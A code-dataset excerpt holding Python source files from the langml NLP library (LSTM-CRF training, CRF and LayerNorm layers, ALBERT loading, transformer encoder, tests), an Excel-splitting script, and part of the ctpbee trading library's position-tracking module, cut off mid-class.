@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
def lstm_crf(epoch: int, batch_size: int, learning_rate: float, dropout_rate: float,
embedding_size: int, hidden_size: int, max_len: Optional[int],
lowercase: bool, tokenizer_type: Optional[str], vocab_path: str,
train_path: str, dev_path: str, test_path: str, save_dir: str,
early_stop: int, distribute: bool, verbose: int):
from langml.baselines.ner.lstm_crf import LstmCRF
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'dropout_rate': dropout_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'hidden_size': hidden_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = LstmCRF(params).build_model()
else:
model = LstmCRF(params).build_model()
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
dev_generator = TFDataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor='val_viterbi_accuracy',
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor='val_viterbi_accuracy',
mode='auto')
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
validation_data=dev_dataset,
validation_steps=len(dev_generator),
verbose=verbose,
epochs=epoch,
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = LstmCRF(params).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
print('develop metrics:')
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
report_detail_metrics(model, dev_generator.datas, id2label, is_bert=False)
if test_datas:
print('test metrics:')
test_generator = DataGenerator(test_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
report_detail_metrics(model, test_generator.datas, id2label, is_bert=False)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
```
#### File: langml/layers/crf.py
```python
from typing import Optional, Callable, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras.backend as K
import keras.layers as L
import tensorflow as tf
from langml.tensor_typing import Tensors
from langml.third_party.crf import crf_log_likelihood, crf_decode
class CRF(L.Layer):
def __init__(self,
output_dim: int,
sparse_target: Optional[bool] = True,
**kwargs):
"""
Args:
output_dim (int): the number of labels to tag each temporal input.
sparse_target (bool): whether the the ground-truth label represented in one-hot.
Input shape:
(batch_size, sentence length, output_dim)
Output shape:
(batch_size, sentence length, output_dim)
Usage:
>>> from tensorflow.keras.models import Sequential
>>> from tensorflow.keras.layers import Input, Embedding, Bidirectional, LSTM, Dense
>>> num_labels = 10
>>> embedding_size = 100
>>> hidden_size = 128
>>> model = Sequential()
>>> model.add(Embedding(num_labels, embedding_size))
>>> model.add(Bidirectional(LSTM(hidden_size, return_sequences=True)))
>>> model.add(Dense(num_labels))
>>> crf = CRF(num_labels, sparse_target=True)
>>> model.add(crf)
>>> model.compile('adam', loss=crf.loss, metrics=[crf.accuracy])
"""
super(CRF, self).__init__(**kwargs)
self.support_mask = True
self.output_dim = output_dim
self.sparse_target = sparse_target
self.input_spec = L.InputSpec(min_ndim=3)
self.supports_masking = False
self.sequence_lengths = None
def build(self, input_shape: Tensors):
assert len(input_shape) == 3
f_shape = input_shape
input_spec = L.InputSpec(min_ndim=3, axes={-1: f_shape[-1]})
if f_shape[-1] is None:
raise ValueError('The last dimension of the inputs to `CRF` '
'should be defined. Found `None`.')
if f_shape[-1] != self.output_dim:
raise ValueError('The last dimension of the input shape must be equal to output'
' shape. Use a linear layer if needed.')
self.input_spec = input_spec
self.transitions = self.add_weight(name='transitions',
shape=[self.output_dim, self.output_dim],
initializer='glorot_uniform',
trainable=True)
self.built = True
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None):
return None
def call(self,
inputs: Tensors,
sequence_lengths: Optional[Tensors] = None,
training: Optional[Union[bool, int]] = None,
mask: Optional[Tensors] = None,
**kwargs) -> Tensors:
sequences = tf.convert_to_tensor(inputs, dtype=self.dtype)
if sequence_lengths is not None:
assert len(sequence_lengths.shape) == 2
assert tf.convert_to_tensor(sequence_lengths).dtype == 'int32'
seq_len_shape = tf.convert_to_tensor(sequence_lengths).get_shape().as_list()
assert seq_len_shape[1] == 1
self.sequence_lengths = K.flatten(sequence_lengths)
else:
self.sequence_lengths = tf.ones(tf.shape(inputs)[0], dtype=tf.int32) * (
tf.shape(inputs)[1]
)
viterbi_sequence, _ = crf_decode(sequences,
self.transitions,
self.sequence_lengths)
output = K.one_hot(viterbi_sequence, self.output_dim)
return K.in_train_phase(sequences, output, training=training)
@property
def loss(self) -> Callable:
def crf_loss(y_true: Tensors, y_pred: Tensors) -> Tensors:
y_true = K.argmax(y_true, 2) if self.sparse_target else y_true
y_true = K.reshape(y_true, K.shape(y_pred)[:-1])
log_likelihood, _ = crf_log_likelihood(
y_pred,
K.cast(y_true, dtype='int32'),
self.sequence_lengths,
transition_params=self.transitions,
)
return K.mean(-log_likelihood)
return crf_loss
@property
def accuracy(self) -> Callable:
def viterbi_accuracy(y_true: Tensors, y_pred: Tensors) -> Tensors:
y_true = K.argmax(y_true, 2) if self.sparse_target else y_true
y_true = K.reshape(y_true, K.shape(y_pred)[:-1])
viterbi_sequence, _ = crf_decode(
y_pred,
self.transitions,
self.sequence_lengths
)
mask = K.all(K.greater(y_pred, -1e6), axis=2)
mask = K.cast(mask, K.floatx())
y_true = K.cast(y_true, 'int32')
corrects = K.cast(K.equal(y_true, viterbi_sequence), K.floatx())
return K.sum(corrects * mask) / K.sum(mask)
return viterbi_accuracy
def compute_output_shape(self, input_shape: Tensors) -> Tensors:
tf.TensorShape(input_shape).assert_has_rank(3)
return input_shape[:2] + (self.output_dim,)
@property
def trans(self) -> Tensors:
""" transition parameters
"""
return K.eval(self.transitions)
def get_config(self) -> dict:
config = {
'output_dim': self.output_dim,
'sparse_target': self.sparse_target,
'supports_masking': self.supports_masking,
'transitions': K.eval(self.transitions)
}
base_config = super(CRF, self).get_config()
return dict(base_config, **config)
@staticmethod
def get_custom_objects() -> dict:
return {'CRF': CRF}
```
#### File: langml/layers/layer_norm.py
```python
from typing import Optional, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras
import keras.backend as K
import keras.layers as L
from langml.tensor_typing import Tensors, Initializer, Constraint, Regularizer
class LayerNorm(L.Layer):
def __init__(self,
center: Optional[bool] = True,
scale: Optional[bool] = True,
epsilon: Optional[float] = 1e-7,
gamma_initializer: Optional[Initializer] = 'ones',
gamma_regularizer: Optional[Regularizer] = None,
gamma_constraint: Optional[Constraint] = None,
beta_initializer: Optional[Initializer] = 'zeros',
beta_regularizer: Optional[Regularizer] = None,
beta_constraint: Optional[Constraint] = None,
**kwargs):
super(LayerNorm, self).__init__(**kwargs)
self.supports_masking = True
self.center = center
self.scale = scale
self.epsilon = epsilon
self.gamma_initializer = keras.initializers.get(gamma_initializer)
self.gamma_regularizer = keras.regularizers.get(gamma_regularizer)
self.gamma_constraint = keras.constraints.get(gamma_constraint)
self.beta_initializer = keras.initializers.get(beta_initializer)
self.beta_regularizer = keras.regularizers.get(beta_regularizer)
self.beta_constraint = keras.constraints.get(beta_constraint)
def get_config(self) -> dict:
config = {
"center": self.center,
"scale": self.scale,
"epsilon": self.epsilon,
"gamma_initializer": keras.initializers.serialize(self.gamma_initializer),
"gamma_regularizer": keras.regularizers.serialize(self.gamma_regularizer),
"gamma_constraint": keras.constraints.serialize(self.gamma_constraint),
"beta_initializer": keras.initializers.serialize(self.beta_initializer),
"beta_regularizer": keras.regularizers.serialize(self.beta_regularizer),
"beta_constraint": keras.constraints.serialize(self.beta_constraint)
}
base_config = super(LayerNorm, self).get_config()
return dict(base_config, **config)
def build(self, input_shape: Tensors):
shape = input_shape[-1:]
if self.scale:
self.gamma = self.add_weight(
shape=shape,
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
name='gamma',
)
if self.center:
self.beta = self.add_weight(
shape=shape,
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
name='beta',
)
super(LayerNorm, self).build(input_shape)
def call(self, inputs: Tensors, **kwargs) -> Tensors:
# layer norm: specify axis=-1
mean = K.mean(inputs, axis=-1, keepdims=True)
variance = K.mean(K.square(inputs), axis=-1, keepdims=True)
std = K.sqrt(variance + self.epsilon)
# standard normalization: x = (x - \mu) / \std
outputs = (inputs - mean) / std
if self.scale:
outputs *= self.gamma
if self.center:
outputs += self.beta
return outputs
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None) -> Union[Tensors, None]:
return mask
@staticmethod
def get_custom_objects() -> dict:
return {'LayerNorm': LayerNorm}
def compute_output_shape(self, input_shape: Tensors) -> Tensors:
return input_shape
```
#### File: langml/plm/albert.py
```python
import json
from typing import Callable, Optional, Tuple, Union
import numpy as np
from langml.tensor_typing import Models
from langml.plm import load_variables
from langml.plm.bert import BERT
def load_albert(config_path: str,
checkpoint_path: str,
seq_len: Optional[int] = None,
pretraining: bool = False,
with_mlm: bool = True,
with_nsp: bool = True,
lazy_restore: bool = False,
weight_prefix: Optional[str] = None,
dropout_rate: float = 0.0,
**kwargs) -> Union[Tuple[Models, Callable], Tuple[Models, Callable, Callable]]:
""" Load pretrained ALBERT
Args:
- config_path: str, path of albert config
- checkpoint_path: str, path of albert checkpoint
- seq_len: Optional[int], specify fixed input sequence length, default None
- pretraining: bool, pretraining mode, default False
- with_mlm: bool, whether to use mlm task in pretraining, default True
- with_nsp: bool, whether to use nsp/sop task in pretraining, default True
- lazy_restore: bool, whether to restore pretrained weights lazily, default False.
Set it as True for distributed training.
- weight_prefix: Optional[str], prefix name of weights, default None.
You can set a prefix name in unshared siamese networks.
- dropout_rate: float, dropout rate, default 0.
Return:
- model: keras model
- bert: bert instance
- restore: conditionally, it will return when lazy_restore=True
"""
# initialize model from config
with open(config_path, 'r') as reader:
config = json.load(reader)
if seq_len is not None:
config['max_position_embeddings'] = min(seq_len, config['max_position_embeddings'])
bert = BERT(
config['vocab_size'],
position_size=config['max_position_embeddings'],
seq_len=seq_len,
embedding_dim=config.get('embedding_size') or config.get('hidden_size'),
hidden_dim=config.get('hidden_size'),
transformer_blocks=config['num_hidden_layers'],
attention_heads=config['num_attention_heads'],
intermediate_size=config['intermediate_size'],
feed_forward_activation=config['hidden_act'],
initializer_range=config['initializer_range'],
dropout_rate=dropout_rate or config.get('hidden_dropout_prob', 0.0),
pretraining=pretraining,
share_weights=True,
weight_prefix=weight_prefix,
**kwargs)
bert.build()
model = bert(with_mlm=with_mlm, with_nsp=with_nsp)
def restore(model):
variables = load_variables(checkpoint_path)
model.get_layer(name=bert.get_weight_name('Embedding-Token')).set_weights([
variables('bert/embeddings/word_embeddings'),
])
model.get_layer(name=bert.get_weight_name('Embedding-Position')).set_weights([
variables('bert/embeddings/position_embeddings')[:config['max_position_embeddings'], :],
])
model.get_layer(name=bert.get_weight_name('Embedding-Segment')).set_weights([
variables('bert/embeddings/token_type_embeddings'),
])
model.get_layer(name=bert.get_weight_name('Embedding-Norm')).set_weights([
variables('bert/embeddings/LayerNorm/gamma'),
variables('bert/embeddings/LayerNorm/beta'),
])
model.get_layer(name=bert.get_weight_name('Embedding-Mapping')).set_weights([
variables('bert/encoder/embedding_hidden_mapping_in/kernel'),
variables('bert/encoder/embedding_hidden_mapping_in/bias'),
])
# 以下权重共享
model.get_layer(name=bert.get_weight_name('Transformer-MultiHeadSelfAttention')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/query/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/key/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/value/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/output/dense/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/query/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/key/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/value/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/output/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('Transformer-MultiHeadSelfAttention-Norm')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm/gamma'),
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm/beta'),
])
model.get_layer(name=bert.get_weight_name('Transformer-FeedForward')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/dense/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/output/dense/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/dense/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/output/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('Transformer-FeedForward-Norm')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm_1/gamma'),
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm_1/beta'),
])
if pretraining:
if with_mlm:
model.get_layer(name=bert.get_weight_name('MLM-Dense')).set_weights([
variables('cls/predictions/transform/dense/kernel'),
variables('cls/predictions/transform/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('MLM-Norm')).set_weights([
variables('cls/predictions/transform/LayerNorm/gamma'),
variables('cls/predictions/transform/LayerNorm/beta'),
])
model.get_layer(name=bert.get_weight_name('MLM-Match')).set_weights([
variables('cls/predictions/output_bias'),
])
if with_nsp:
model.get_layer(name=bert.get_weight_name('NSP-Dense')).set_weights([
variables('bert/pooler/dense/kernel'),
variables('bert/pooler/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('NSP')).set_weights([
np.transpose(variables('cls/seq_relationship/output_weights')),
variables('cls/seq_relationship/output_bias'),
])
return model
if lazy_restore:
return model, bert, restore
model = restore(model)
return model, bert
```
#### File: langml/transformer/encoder.py
```python
from typing import Optional, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras.layers as L
else:
import keras.layers as L
from langml.layers import MultiHeadAttention, LayerNorm
from langml.tensor_typing import Tensors, Activation
from langml.transformer import gelu, FeedForward
class TransformerEncoder:
def __init__(self,
attention_heads: int,
hidden_dim: int,
attention_activation: Optional[Union[str, Activation]] = None,
feed_forward_activation: Optional[Union[str, Activation]] = gelu,
dropout_rate: float = 0.0,
trainable: Optional[bool] = True,
name: Optional[str] = 'Transformer-Encoder'):
self.name = name
self.dropout_rate = dropout_rate
self.multihead_layer = MultiHeadAttention(head_num=attention_heads,
return_attention=False,
attention_activation=attention_activation,
history_only=False,
trainable=trainable,
name=f'{self.name}-MultiHeadSelfAttention')
if dropout_rate > 0.0:
self.attn_dropout_layer = L.Dropout(rate=dropout_rate, name=f'{self.name}-MultiHeadSelfAttention-Dropout')
self.attn_residual_layer = L.Add(name=f'{self.name}-MultiHeadSelfAttention-Add')
self.attn_layer_norm = LayerNorm(name=f'{self.name}-MultiHeadSelfAttention-Norm', trainable=trainable)
self.ffn_layer = FeedForward(hidden_dim,
activation=feed_forward_activation,
name=f'{self.name}-FeedForward')
if dropout_rate > 0.0:
self.ffn_dropout_layer = L.Dropout(rate=dropout_rate, name=f'{self.name}-FeedForward-Dropout')
self.ffn_residual_layer = L.Add(name=f'{self.name}-FeedForward-Add')
self.ffn_layer_norm = LayerNorm(name=f'{self.name}-FeedForward-Norm', trainable=trainable)
def __call__(self, inputs: Tensors) -> Tensors:
attn_output = self.multihead_layer(inputs)
if self.dropout_rate > 0.0:
attn_output = self.attn_dropout_layer(attn_output)
if isinstance(inputs, list):
inputs = inputs[0]
attn_output = self.attn_residual_layer([inputs, attn_output])
attn_output = self.attn_layer_norm(attn_output)
ffn_output = self.ffn_layer(attn_output)
if self.dropout_rate > 0.0:
ffn_output = self.ffn_dropout_layer(ffn_output)
ffn_output = self.ffn_residual_layer([attn_output, ffn_output])
ffn_output = self.ffn_layer_norm(ffn_output)
return ffn_output
class TransformerEncoderBlock:
def __init__(self,
blocks: int,
attention_heads: int,
hidden_dim: int,
attention_activation: Optional[Union[str, Activation]] = None,
feed_forward_activation: Optional[Union[str, Activation]] = gelu,
dropout_rate: float = 0.0,
trainable: Optional[bool] = False,
name: Optional[str] = 'TransformerEncoderBlock',
share_weights: bool = False):
if share_weights:
encoder = TransformerEncoder(attention_heads,
hidden_dim,
attention_activation=attention_activation,
feed_forward_activation=feed_forward_activation,
dropout_rate=dropout_rate,
trainable=trainable,
name=name)
self.encoders = [encoder for _ in range(blocks)]
else:
self.encoders = [
TransformerEncoder(attention_heads,
hidden_dim,
attention_activation=attention_activation,
feed_forward_activation=feed_forward_activation,
dropout_rate=dropout_rate,
trainable=trainable,
name=f'{name}-{i+1}')
for i in range(blocks)
]
def __call__(self, inputs: Tensors) -> Tensors:
output = inputs
for encoder in self.encoders:
output = encoder(output)
return output
```
#### File: langml/tests/test_model.py
```python
import shutil
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras
import keras.backend as K
import keras.layers as L
def test_save_load_model_single_input():
from langml.layers import SelfAttention
from langml.model import save_frozen, load_frozen
num_labels = 2
embedding_size = 100
hidden_size = 128
model = keras.Sequential()
model.add(L.Embedding(num_labels, embedding_size))
model.add(L.Bidirectional(L.LSTM(hidden_size, return_sequences=True)))
model.add(SelfAttention(hidden_size, return_attention=False))
model.add(L.Dense(num_labels, activation='softmax'))
model.compile('adam', loss='mse', metrics=['accuracy'])
save_frozen(model, 'self_attn_frozen')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('self_attn_frozen')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('self_attn_frozen', session=session)
shutil.rmtree('self_attn_frozen')
assert model is not None
def test_save_load_model_multi_input():
from langml.layers import SelfAttention
from langml.model import save_frozen, load_frozen
in1 = L.Input(shape=(None, 16), name='input-1')
in2 = L.Input(shape=(None, 16), name='input-2')
x1, x2 = in1, in2
o1 = SelfAttention(return_attention=False)(x1)
o2 = SelfAttention(return_attention=False)(x2)
o = L.Concatenate()([o1, o2])
o = L.Dense(2)(o)
model = keras.Model([x1, x2], o)
model.compile('adam', loss='mse', metrics=['accuracy'])
save_frozen(model, 'self_attn_frozen.multi_input')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('self_attn_frozen.multi_input')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('self_attn_frozen.multi_input', session=session)
shutil.rmtree('self_attn_frozen.multi_input')
assert model is not None
def test_save_load_model_multi_input_output():
from langml.layers import SelfAttention
from langml.model import save_frozen, load_frozen
in1 = L.Input(shape=(None, 16), name='input-1')
in2 = L.Input(shape=(None, 16), name='input-2')
x1, x2 = in1, in2
o1 = SelfAttention(return_attention=False)(x1)
o2 = SelfAttention(return_attention=False)(x2)
model = keras.Model([x1, x2], [o1, o2])
model.compile('adam', loss='mse', metrics=['accuracy'])
save_frozen(model, 'self_attn_frozen.multi_input_output')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('self_attn_frozen.multi_input_output')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('self_attn_frozen.multi_input_output', session=session)
shutil.rmtree('self_attn_frozen.multi_input_output')
assert model is not None
def test_crf_save_load():
from langml.layers import CRF
from langml.model import save_frozen, load_frozen
num_labels = 10
embedding_size = 100
hidden_size = 128
model = keras.Sequential()
model.add(L.Embedding(num_labels, embedding_size, mask_zero=True))
model.add(L.LSTM(hidden_size, return_sequences=True))
model.add(L.Dense(num_labels))
crf = CRF(num_labels, sparse_target=False)
model.add(crf)
model.summary()
model.compile('adam', loss=crf.loss, metrics=[crf.accuracy])
save_frozen(model, 'crf_frozen')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('crf_frozen')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('crf_frozen', session=session)
shutil.rmtree('crf_frozen')
assert model is not None
def test_crf_dense_target_save_load():
from langml.layers import CRF
from langml.model import save_frozen, load_frozen
num_labels = 10
embedding_size = 100
hidden_size = 128
model = keras.Sequential()
model.add(L.Embedding(num_labels, embedding_size, mask_zero=True))
model.add(L.LSTM(hidden_size, return_sequences=True))
model.add(L.Dense(num_labels))
crf = CRF(num_labels, sparse_target=False)
model.add(crf)
model.summary()
model.compile('adam', loss=crf.loss, metrics=[crf.accuracy])
save_frozen(model, 'crf_frozen_dense_target')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('crf_frozen_dense_target')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('crf_frozen_dense_target', session=session)
shutil.rmtree('crf_frozen_dense_target')
assert model is not None
```
#### File: langml/tests/test_transformer.py
```python
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras.backend as K
import keras.layers as L
def test_transformer_encoder():
from langml.transformer.encoder import TransformerEncoder
X = L.Input(shape=(None, 64))
o = TransformerEncoder(4, 64)(X)
assert K.int_shape(o) == K.int_shape(X)
def test_transformer_encoder_block():
from langml.transformer.encoder import TransformerEncoderBlock
X = L.Input(shape=(None, 64))
o = TransformerEncoderBlock(2, 4, 64)(X)
assert K.int_shape(o) == K.int_shape(X)
``` |
{
"source": "4amup/flash",
"score": 2
} |
#### File: 4amup/flash/flash.py
```python
import xlwings as xw
import os
import sys
import time
#1.获取拖动文件的绝对路径
cur_dir_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))#格式化时间字符串:如20190822080449
drag_file_path = sys.argv[1]#拖动文件到exe可执行程序上时,第二个参数是拖上来的文件的绝对路径
# drag_file_path = r'C:\Users\lee\Desktop\test.XLSX'
desk_path = os.path.join(os.path.expanduser("~"), 'Desktop')#当前用户桌面路径
output_path = os.path.join(desk_path, cur_dir_name)#创建文件夹
# readme_info = r'C:\Users\lee\Desktop\output\readme.txt'
#2.查看输出文件夹是否存在
if os.path.exists(output_path):
pass
else:
os.mkdir(output_path)#不存在则在桌面创建一个文件夹
#2.打开文件并获取相关信息到数组中
app=xw.App(visible=False,add_book=False)
app.display_alerts=False
app.screen_updating=False
wb = app.books.open(drag_file_path)
sht = wb.sheets[0]
#3.取表头和整表数据
table_head_list = sht.range('A1').expand('right')
table_data = sht.range('A2').expand()
#4.找供应商所在列SUPPLIER_COLUMN
def find_supplier_col(head_list):
for item in head_list:
if item.value == '供应商名称':
return item.column
SUPPLIER_COLUMN = find_supplier_col(table_head_list)
#5.过滤供应商为空的行
def supplier_empty(l):
return l[SUPPLIER_COLUMN-1] and l[SUPPLIER_COLUMN-1].strip()
supplier_filter = list(filter(supplier_empty, table_data.value))
#6.按供应商排序
def supplier_name_sort(l):
return l[SUPPLIER_COLUMN-1]
supplier_sorted = sorted(supplier_filter, key=supplier_name_sort)
#7.取供应商形成一个排序后列表
supplier_name_list = []
for item in supplier_sorted:
supplier_name_list.append(item[SUPPLIER_COLUMN-1])
supplier_name_list = list(set(supplier_name_list))#数组去重
supplier_name_list.sort()
#3.处理数组:筛选(去掉供应商列为空的行),按【供应商】排序,按供应商拆分文件
#算法逻辑,取变化点的index,然后倒置,拆分长数组
def find_split_idx(suppliers):
supplier_name_temp = ''
i = 0
arr = []
for l in suppliers:
supplier_name = l[SUPPLIER_COLUMN-1]
if supplier_name_temp != supplier_name:
supplier_name_temp = supplier_name
arr.append(i)
i += 1
return arr
split_idx = find_split_idx(supplier_sorted)
split_idx.reverse()
def split_data(supplier_list):
data = []
arr = supplier_list
for l in split_idx:
group = arr[l:]
arr = arr[:l]
data.append(group)
data.reverse()
return data
all_data = split_data(supplier_sorted)
#4.创建文件夹并保存拆分的文件
counter = 0
for data in all_data:
data.insert(0,table_head_list.value)#插入表头
temp_wb = xw.Book()
# temp_wb = app.books.add()
temp_wb.sheets['sheet1'].range('A1').value = data
temp_wb.save(os.path.join(output_path, supplier_name_list[counter]+'.XLSX'))
temp_wb.close()
counter+=1
wb.close()
app.quit()
``` |
{
"source": "4amxu/ctpbee",
"score": 3
} |
#### File: ctpbee/data_handle/level_position.py
```python
import io
import json
import os
from json import load, dump, JSONDecodeError
from ctpbee.center import PositionModel
from ctpbee.constant import TradeData, PositionData, Direction, Offset, Exchange
class SinglePositionModel:
def __init__(self, local_symbol):
self.local_symbol = local_symbol
# 持仓方向
self.direction = None
# 昨日持仓
self.yd_volume: int = 0
# 今日持仓
self.td_volume: int = 0
# 持仓均价
self.price: float = 0
# 持仓数目
self.volume: int = 0
# 交易所代码
self.exchange = None
# 持仓盈利
self.pnl: float = 0
# 网关名字
self.gateway_name = None
def update_trade(self, trade):
"""根据立即成交的信息来更新本地持仓 """
self.exchange = trade.exchange
self.direction = trade.direction
cost = self.price * self.volume
cost += trade.volume * trade.price
new_pos = self.volume + trade.volume
if new_pos:
self.price = cost / new_pos
else:
self.price = 0
if trade.offset == Offset.OPEN:
self.td_volume += trade.volume
# 平今/home/somewheve/PycharmProjects/ctpbee_tutorial
elif trade.offset == Offset.CLOSETODAY:
self.td_volume -= trade.volume
# 平昨
elif trade.offset == Offset.CLOSEYESTERDAY:
self.yd_volume -= trade.volume
# 平仓
elif trade.offset == Offset.CLOSE:
if trade.volume < self.td_volume:
self.td_volume -= trade.volume
else:
self.yd_volume -= trade.volume - self.td_volume
self.td_volume = 0
self.volume = self.yd_volume + self.td_volume
def update_postition(self, position: PositionData):
""" 根据返回的查询持仓信息来更新持仓信息 """
self.yd_volume = position.yd_volume
self.exchange = position.exchange
self.price = position.price
self.volume = position.volume
self.direction = position.direction
self.gateway_name = position.gateway_name
def to_dict(self):
""" 将持仓信息构建为字典的信息"""
if isinstance(self.direction, Direction):
direction = self.direction.value
else:
direction = self.direction
if isinstance(self.exchange, Exchange):
exchange = self.direction.value
else:
exchange = self.direction
return {
"direction": direction,
"yd_volume": self.yd_volume,
"local_symbol": self.local_symbol,
"exchange": exchange,
"price": self.price,
"volume": self.volume
}
@property
def _to_dict(self):
return self.to_dict
def to_position(self):
""" 返回为持仓 """
try:
return PositionData(symbol=self.local_symbol.split(".")[0], exchange=self.exchange, volume=self.volume,
price=self.price)
except Exception:
raise ValueError(f"本地维护符号有问题,请检查,当前符号为{self.local_symbol}")
def to_df(self):
""" 将持仓信息构建为DataFrame """
pass
@classmethod
def create_model(cls, local, **kwargs):
"""
根据字典数据创建PositionModel实例
"""
instance = cls(local)
{setattr(instance, key, value) for key, value in kwargs.items()}
return instance
class ApiPositionManager(dict):
def __init__(self, name, cache_path=None, init_flag: bool = False):
"""
策略持仓管理的基本信息,注意你需要确保没有在其他地方进行下单, 否则会影响到持仓信息的准确性
* name: 策略名称
* cache_path: 缓存文件地址,注意如果是默认的策略持仓参数会被放置到用户目录下的.ctpbee/api目录下
"""
self.filename = name + ".json"
dict.__init__(self)
